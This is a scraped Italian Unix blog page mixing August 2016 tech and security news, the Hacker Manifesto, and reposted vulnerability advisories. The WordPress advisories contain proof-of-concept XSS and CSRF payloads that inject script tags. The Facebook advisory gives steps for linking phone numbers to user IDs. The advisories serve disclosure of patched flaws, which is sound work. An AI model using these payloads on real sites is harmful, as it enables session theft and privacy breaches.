MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

29Aug/160

Mr. Robot, la serie tv diventa un videogame

Mr. Robot la serie tv diventa un videogame

Per una serie tv così legata al mondo degli hacker e dell’informatica, l’arrivo di un videogioco era praticamente obbligatorio.
Ecco allora che dalla Gamescom, l’annuale fiera di Colonia dedicata al mondo videoludico, è arrivato l’annuncio ufficiale di Mr. Robot 1.51exfiltrati0n, un’app per Android e iOS che pesca a piene mani dall’universo dello show con Rami Malek e Christian Slater.

Il gioco, pubblicato da Telltale Games, riproduce in maniera fedele un’app di messaggistica istantanea sviluppata dalla Evil Corp., la multinazionale che nella serie tv rappresenta l’antagonista del gruppo di hacker fsociety, guidati proprio dal misterioso Mr. Robot.
Tra chat, scambi di file e informazioni segrete, i giocatori potranno dialogare con i personaggi della serie e scegliere di contribuire alla caduta della Evil.
Oppure mettere i bastoni tra le ruote agli hacker, facendo in piena libertà le proprie scelte: al centro della storia, infatti, c’è sempre il giocatore.

Mr.Robot 1.51exfiltration è già disponibile a circa 3,30 euro sia su smartphone Android che dispositivi iOS.
Per ricevere aggiornamenti sul gioco invece, basta seguire l’account twitter ufficiale @ecorpmessaging.

Fonte: http://www.lastampa.it/2016/08/17/tecnologia/giochi/mr-robot-la-serie-tv-diventa-un-videogame-q58kQJttVFQVGxkdwBHiEO/pagina.html

(29)

29Aug/160

Come evitare che Facebook usi i nostri dati di WhatsApp

whatsapp facebook

WhatsApp e Facebook sono e rimarranno due applicazioni separate sul nostro smartphone. Ma l’aggiornamento dei termini e dell’informativa sulla privacy dell’iconcina di messaggistica (comunicato qui) le avvicina molto. E porta le imprese all’interno delle chat. Il colosso di Mark Zuckerberg ha acquistato WhatsApp nel febbraio del 2014 con la promessa da ambo le parti di non mischiare servizi e dati, soprattutto in considerazione del fatto che il social network si basa sulla vendita di pubblicità mentre l’app verde è priva di annunci.
Adesso qualcosa è cambiato: una serie di informazioni relative a WhatsApp, come il nostro numero di telefono o gli accessi alle finestre di dialogo, verranno condivise con Facebook e con il resto del gruppo di Menlo Park. Instagram o Oculus, ad esempio. Come l’iconcina fondata da Jan Koum ha tenuto a sottolineare, non vengono coinvolti i contenuti degli scambi: la crittografia end to end introdotta in aprile impedisce a chiunque di vedere testi o fotografie in transito da un dispositivo all’altro.

Concretamente cosa vuol dire e cosa cambia per noi? Il social network da 1,7 miliardi di utenti potrà attingere (anche) a questi dati per inviarci messaggi pubblicitari sempre più mirati quando navighiamo sulla sua piattaforma o per consigliarci potenziali amici da aggiungere alla nostra cerchia. Potrà capitare di vedere fra i suggerimenti di Facebook il nome e il volto di una persona con cui si è appena entrati in contatto su WhatsApp. O di imbatterci sul social network nella pubblicità di un’azienda che conosce il nostro numero di telefono.

Non solo, anche l’applicazione di messaggistica da più un miliardo di utenti si sta per aprire direttamente alle imprese. L’intenzione non è di ospitare messaggi pubblicitari classici ma di consentire, ad esempio, alla banca di avvisarci di eventuali movimenti strani sul nostro conto, alla compagnia aerea di tenerci aggiornati sul ritardo del volo che stiamo per prendere o alla pizzeria di comunicarci che il pasto ordinato sta per arrivare. La novità verrà testata nei prossimi mesi, ed era stata annunciata a inizio anno, e sembra propendere per la creazione di chat ufficiali cui potremo decidere o meno di aderire - ma che saranno anche sfruttate per inviarci consigli su prodotti o servizi da acquistare in base alle nostre preferenze - e non dovrebbero interromperci durante le chiacchierate canoniche.

...

Fonte: http://www.corriere.it/tecnologia/social/16_agosto_26/come-evitare-che-whatsapp-condivida-dati-facebokk-bdd8fbea-6ba7-11e6-8bdd-2a860cc068c8.shtml
(11)

26Aug/160

Dropbox email warns users that old passwords must be reset

http://www.theinquirer.net/inquirer/news/2469065/dropbox-email-warns-users-that-old-passwords-must-be-reset (42)

24Aug/160

Malicious QuadRooter Apps Discovered in Google Play Store

Malicious QuadRooter Apps Discovered in Google Play Store

The recent disclosure of a set of vulnerabilities in the Android operating system that could potentially put over 900 million devices at risk may have been patched, but its threat remains.

The QuadRooter flaw, discovered by Check Point, could potentially give cyber attackers complete control over an Android device. The vulnerability was discovered in Qualcomm chips, which are used in smartphones and tablets made by Blackberry, LG, Google and more. This put up to 900 million devices at risk. The flaw was dubbed QuadRooter because there are four interconnected flaws which can be used to gain access to the “root” of the phone, the Guardian said.

Patches to fix the flaw were made available quickly, and Check Point released an app called QuadRooter Scanner on the Google Play store which checked whether a device was at risk.

However, new research has revealed that QuadRooter’s threat is still alive. Researchers at RiskIQ have found a number of malicious apps available for download on various app stores that claim to offer a fix for the flaw, but of course do nothing of the sort.

One of these, called Fix Patch QuadRooter by KiwiApps Ltd was found in the official Google Play store. Although it was removed from there it popped up in a number of unofficial app stores, along with a number of others. In total, 27 malicious apps related to QuadRooter have so far been found.

These have been found available for download in the official Google Play store, as well as others such as BingAPK, SameAPK, AppBrain, and AppChina. All these unofficial sources carry big risks to users and their devices.

These unofficial, third-party app stores are a dangerous place; a lack of quality control means many applications are malicious, containing malware that can steal personal data. While these app stores may seem convenient for users, especially in countries where official apps may not be available, users should stick with the official Google Play Store wherever possible.

Photo © ymgerman/Shutterstock.com

Fonte: http://www.infosecurity-magazine.com/news/malicious-quadrooter-apps/

(47)

23Aug/160

The Hacker Manifesto in italiano

La coscienza di un hacker di The Mentor

Scritto l'8 gennaio 1986

Un altro è stato preso oggi, è su tutti i giornali. "Adolescente arrestate in uno scandalo di crimini informatici", "Hacker arrestato dopo aver truffato una banca"... Dannati ragazzi. Sono tutti uguali.

Ma avete mai, con la volta psicologia da tre soldi e un tecnocervello del 1950, dato un'occhiata dietro gli occhi di un hacker? Vi siete mai chiesti cosa è scattato in lui, quali forze lo muovono, cosa può averlo influenzato? Sono un hacker, entrate nel mio mondo... Il mio è un mondo che inizia con la scuola... sono più intelligente della maggior parte degli altri ragazzi, queste stronzate che ci insegnano mi annoiano... Dannati sottosviluppati. Sono tutti uguali.

Sono nella junior o nella high school. Ho ascoltato insegnanti spiegare per la quindicesima volta come ridurre una frazione. L'ho capito. "No, Ms. Smith, non l'ho scritto. Ce l'ho in testa..." Dannato ragazzo. Probabilmente ha copiato. Sono tutti uguali.

Ho fatto una scoperta oggi. Ho trovato un computer. Aspetta un secondo, è forte. Fa ciò che voglio. Se fa un errore, è perchè ho sbagliato io. Non perchè non gli piaccio... O si sente minacciato da me... O pensa che sono un culo intelligente... O non gli piace insegnare e non dovrebbe essere qui... Dannato ragazzo. Non fa altro che giocare. Sono tutti uguali.

E poi è successo... una porta si è aperta verso un mondo... mi lancio attraverso la linea telefonica come eroina nelle vene di un tossico, un impulso elettronico è stato inviato, ho visto un rifugio dalle incompetente del giorno-dopo-giorno... ho trovato una board (una vecchia chat, ndr). "Ecco... sono a casa..." Conosco tutti qui... anche se non li ho mai incontrati, non gli ho mai parlato, potrei non sentire mai parlare di loro in vita mia... vi conosco tutti... Dannato ragazzo. Tiene di nuovo occupata la linea. Sono tutti uguali...

Potete scommetterci il culo che siamo tutti uguali... ci date gli omogeneizzati col cucchiaino a scuola quando noi avevamo fame di bistecche... i pezzi di carne che avete lasciato cadere erano pre-masticati e insapori. Siamo stati dominati dai sadici, o ignorati dagli apatici. I pochi che avevano qualcosa da insegnarci ci hanno trovati allievi volenterosi, ma quei pochi sono come gocce d'acqua nel deserto.

Questo è il nostro mondo ora... il mondo degli elettroni e degli interruttori, la bellezza del baud. Facciamo uso di un servizio già esistente senza pagare per ciò che dovrebbe costare due soldi se non appartenesse a gente ghiotta di profitti, e voi ci chiamate criminali. Esploriamo... e ci chiamate criminali. Cerchiamo conoscenza... e ci chiamate criminali. Esistiamo senza il colore della pelle, senza nazionalità, senza preferenze religiose...e ci chiamate criminali. Voi costruite le bombe atomiche, fate le guerre, uccidete, imbrogliate, ci mentite e cercate di farci credere che è per il vostro dio, eppure siamo noi i criminali.

Manifesto hacker ...

 

  (61)

23Aug/160

New Pokemon Go Ransomware Creates Windows Backdoor Account

New Pokemon Go Ransomware Creates Windows Backdoor Account

With all the frenzy around the Pokemon GO mobile game, it was only just a matter of time before attackers leveraged its popularity to spread ransomware. A new ransomware was recently discovered impersonating a Pokemon GO application for Windows. Detected by Trend Micro as Ransom_POGOTEAR.A, it appears to be like any other ransomware. However, a closer look revealed that its creators based it on Hidden Tear, an open-sourced piece of ransomware released last August 2015, with the intention of educating people.

The Pokemon GO ransomware developer designed it to create a “Hack3r” backdoor user account in Windows and is added to the Administrator group. The registry is tweaked to hide the Hack3r account from the Windows login screen. Another feature creates a network share on the victim’s computer, allowing the ransomware to spread by copying the executable to all drives. Once the executable is copied to removable drives, it creates an autorun file so the ransomware runs each time someone accesses the removable drive. The executable is also copied to the root of other fixed drives. This way, the Pokemon GO ransomware will run when the victim logs into Windows.

There are numerous indicators that the ransomware is still under development. One of them is that it has a static AES encryption key of “123vivalalgerie”. Additionally, the command & control server (C&C) uses a private IP address which means it cannot connect over the Internet.

Based on the language used by the ransom note, the Pokemon GO ransomware appears to target Arabic-speaking users, with an accompanying ransom screen that features a Pikachu image. In addition, the screensaver executable is also embedded with an image of “Sans Titre”, which is French for “Untitled”, suggesting a clue to the developer's origin.

The Hidden Tear ransomware isn’t new. In January 2015, Trend Micro discovered a hacked website in Paraguay that distributed ransomware detected as RANSOM_CRYPTEAR.B. According to the analysis, the website was compromised by a Brazilian hacker, and that the ransomware was created using a modified Hidden Tear code. Prior to this discovery, when the source code of Hidden Tear was made public for educational purposes, the creator was very specific about not using Hidden Tear as ransomware. Unfortunately, as expected, the following discovery of Ransom_CRYPTEAR.B and this current Pokemon-themed ransomware has shown that even with the best intentions, improper disclosure of sensitive information can lead to troublesome scenarios such as the mentioned discoveries.

To avoid ransomware, users are encouraged to regularly back up files and to have an updated security solution. Trend Micro solutions can protect users from the recent Pokemon Go ransomware. As the game is introduced in new regions, the Pokemon GO craze is expected to continue to gain momentum and cybercriminals will find ways to capitalize on it. In fact, in the month of July alone, malicious Pokemon Go apps were found tricking users into downloading them. This should remind users to remain vigilant of threats that may ride along the popularity of such games.

Visit the Threat Encyclopedia for step-by-step instructions on how to remove Ransom_POGOTEAR.A.

Fonte: http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/new-pokemon-go-ransomware-creates-windows-backdoor-account

(366)

19Aug/160

WordPress Google Maps 2.1.2 Cross Site Scripting

------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Google Maps WordPress Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016
 
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Google Maps
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.
 
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0038
 
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Google Maps WordPress Plugin
version 2.1.2.
 
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Google Maps version 2.1.4.
 
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_google_maps_wordpress_plugin.html
 
This issue exists due to the lack of output encoding on the id URL parameter. The vulnerable code fragment is listed below:
 
<form action="admin.php?page=hugeitgooglemaps_main&task=edit_cat&id=<?php echo $_GET['id']; ?>" method="post" name="adminform" id="adminform">
 
Proof of concept
 
http://<target>/wp-admin/admin.php?page=hugeitgooglemaps_main&task=edit_cat&id=1%22%3E%3Ch3%3EBREAK%3C%2Fh3%3E
 
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

(83)

19Aug/160

WordPress Magic Fields 2 Cross Site Scripting

------------------------------------------------------------------------
Persistent Cross-Site Scripting in Magic Fields 2 WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016
 
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Magic Fields 2
plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.
 
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0017
 
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Magic Fields 2 version 2.3.2.4.
 
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in version 2.3.3
 
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_magic_fields_2_wordpress_plugin.html
 
The Magic Fields plugin lacks a CSRF (nonce) token on the request of adding a magic field. The magic field lacks output encoding which could result in malicious script inserted by an attacker.
 
You need to lure a logged-in admin to follow a malicious link containing the poc below.
Proof of concept
 
The proof of concept below injects script code in the "Login Required Message" in the settings page.
 
<html>
   <body>
      <form action="http://build.wordpress-develop.dev/wp-admin/admin.php?page=mf_dispatcher&init=true&mf_section=mf_custom_fields&mf_action=save_custom_field" method="POST">
         <input type="hidden" name="mf_field[core][id]" value="" />
         <input type="hidden" name="mf_field[core][post_type]" value="page" />
         <input type="hidden" name="mf_field[core][custom_group_id]" value="" />
         <input type="hidden" name="mf_field[core][label]" value="foo"><script>alert(1)</script>" />
         <input type="hidden" name="mf_field[core][name]" value="foo" />
         <input type="hidden" name="mf_field[core][description]" value="asdasdasd" />
         <input type="hidden" name="mf_field[core][type]" value="audio" />
         <input type="hidden" name="mf_field[core][required_field]" value="0" />
         <input type="hidden" name="mf_field[core][duplicate]" value="0" />
         <input type="hidden" name="submit" value="Save Custom Field" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>
 
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

(65)

19Aug/160

WordPress Magic Fields 1 Cross Site Scripting

------------------------------------------------------------------------
Persistent Cross-Site Scripting in Magic Fields 1 WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016
 
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Magic Fields 1
plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.
 
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0020
 
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Magic Fields 1 version 1.7.1.
 
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in version 1.7.2
 
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_magic_fields_1_wordpress_plugin.html
 
The Magic Fields plugin lacks a CSRF (nonce) token on the request of adding a magic field. The description field of custom fields lacks output encoding which could result in malicious script inserted by an attacker and executed in the browser.
 
You need to lure a logged-in admin to follow a malicious link containing the poc below.
Proof of concept
 
The proof of concept below injects script code in the "description" field when adding a new custom field.
 
<html>
   <body>
      <form action="http://build.wordpress-develop.dev/wp-admin/admin.php?page=MagicFieldsMenu&custom-write-panel-id=1&mf_action=finish-create-custom-field" method="POST">
         <input type="hidden" name="custom-group-id" value="1" />
         <input type="hidden" name="custom-field-name" value="asd222asd" />
         <input type="hidden" name="custom-field-description" value="as22da2<script>alert(1)</script>" />
         <input type="hidden" name="custom-field-duplicate" value="" />
         <input type="hidden" name="custom-field-order" value="0" />
         <input type="hidden" name="custom-field-required" value="0" />
         <input type="hidden" name="custom-field-type" value="1" />
         <input type="hidden" name="custom-field-helptext" value="" />
         <input type="hidden" name="custom-field-css" value="magicfields" />
         <input type="hidden" name="custom-field-size" value="25" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>
 
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

(60)

10Aug/160

Facebook User ID Bypass Issue

Authored by SaifAllah benMassaoud, Zahid Mehmood | Site vulnerability-lab.com
A vulnerability allowed remote attackers to determine which specific Facebook user ID is linked with a mobile phone number without secure approval. The vulnerability is located in the ctx and recover lwv parameters and /login/identify modules.

Change MirrorDownload
Document Title:
===============
Facebook Bug Bounty #33 - Bypass ID user to linked Phone Number Vulnerability

References (Source):
====================

http://www.vulnerability-lab.com/get_content.php?id=1896

Release Date:
=============
2016-08-08

Vulnerability Laboratory ID (VL-ID):
====================================
1896

Common Vulnerability Scoring System:
====================================
3.5

Product & Service Introduction:
===============================
Facebook is a for-profit corporation and online social networking service based in Menlo Park, California, United States. The Facebook website was
launched on February 4, 2004 by Mark Zuckerberg, along with fellow Harvard College students and roommates, Eduardo Saverin, Andrew McCollum, Dustin
Moskovitz, and Chris Hughes. The founders had initially limited the website's membership to Harvard students; however, later they expanded it to
higher education institutions in the Boston area, the Ivy League schools, and Stanford University. Facebook gradually added support for students
at various other universities, and eventually to high school students as well. Since 2006, anyone age 13 and older has been allowed to become a
registered user of Facebook, though variations exist in the minimum age requirement, depending on applicable local laws. The Facebook name comes
from the face book directories often given to United States university students. After registering to use the site, users can create a user profile,
add other users as `friends`, exchange messages, post status updates and photos, share videos, use various applications (apps), and receive
notifications when others update their profiles. Additionally, users may join common-interest user groups organized by workplace, school, or other
topics, and categorize their friends into lists such as `People From Work` or `Close Friends`. In groups, editors can pin posts to top. Additionally,
users can complain about or block unpleasant people. Because of the large volume of data that users submit to the service, Facebook has come under
scrutiny for their privacy policies. Facebook, Inc. held its initial public offering (IPO) in February 2012, and began selling stock to the public
three months later, reaching an original peak market capitalization of $104 billion. On July 13, 2015, Facebook became the fastest company in the
Standard & Poor's 500 Index to reach a market cap of $250 billion. Facebook has more than 1.65 billion monthly active users as of March 31, 2016.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Facebook )

Abstract Advisory Information:
==============================
Two independent vulnerability laboratory researchers discovered a bypass and validation vulnerability in the Facebook online service web-application & mobile api.

Vulnerability Disclosure Timeline:
==================================
2016-04-02: Researcher Notification & Coordination (SaifAllah benMassaoud & Zahid Mehmood)
2016-04-03: Vendor Notification (Facebook Whitehat Security Team)
2016-04-09: Vendor Response/Feedback (Facebook Whitehat Security Team)
2016-05-20: Vendor Fix/Patch (Facebook Developer Team)
2016-05-21: Security Acknowledgements (Facebook Whitehat Security Team - Bounty: 1500$)
2016-08-08: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Facebook
Product: Mobile Web Application (API) 2016 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
The bypass user id web vulnerability has been discovered in the official Facebook online service web-application & mobile api.

The vulnerability allows remote attackers to determine which specific Facebook user ID is linked with a mobile phone number
without secure approval. The vulnerability is located in the `ctx" and `recover` `lwv` parameters and `/login/identify` modules.
Attackers can setup the privacy settings, who can look me up using a phone number? Set it to Friends Only, the attacker is able
to bypass that security approval to preview.

The security risk of the bypass user id vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the vulnerability allows an attacker to determine which specific facebook user ID is linked with the mobile phone number.

Vulnerable Module(s):
[+] /login/identify

Vulnerable Parameter(s):
[+] ctx
[+] recover
[+] lwv

Proof of Concept (PoC):
=======================
The bypass user id issue can be exploited by remote attackers to determine which specific Facebook user ID is linked to a mobile phone number.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the following url with ssl
Note: https://www.facebook.com/login/identify?ctx=recover&lwv=111
2. Type phone number in the box (Email, Phone, Username or Full Name)
Note: For example, i am attacking one of my test facebook IDs, where i turn on my privacy settings to `Who can look you up using the phone number you provided?`(Friends Only).
No one can see my profile name etc ... Type a number in the box (The facebook account you're attacking only has a mobile phone number added). In my case i used my test id and click on `Serach`
3. Now the attacker clicks to `No Longer have access to these?`
4. Type "New Email" Confirm "New Email"
5. Now `Fill in the form` with fake information and process to `Submit`
Note: You will receive a response from facebook to your email ibox that confirms the issue.

Solution - Fix & Patch:
=======================
The vulnerability was addressed by the facebook developer team during the updates 2016-05-20.

Security Risk:
==============
The security risk of the `./login/identify` bypass user id vulnerability is estimated as medium. (CVSS 3.5)

Credits & Authors:
==================
SaifAllah benMassaoud & Zahid Mehmood - ( http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud )

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

Copyright A(c) 2016 | Vulnerability Laboratory - [Evolution Security GmbH]aC/

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
(95)

Inserito in: REMOTE Nessun commento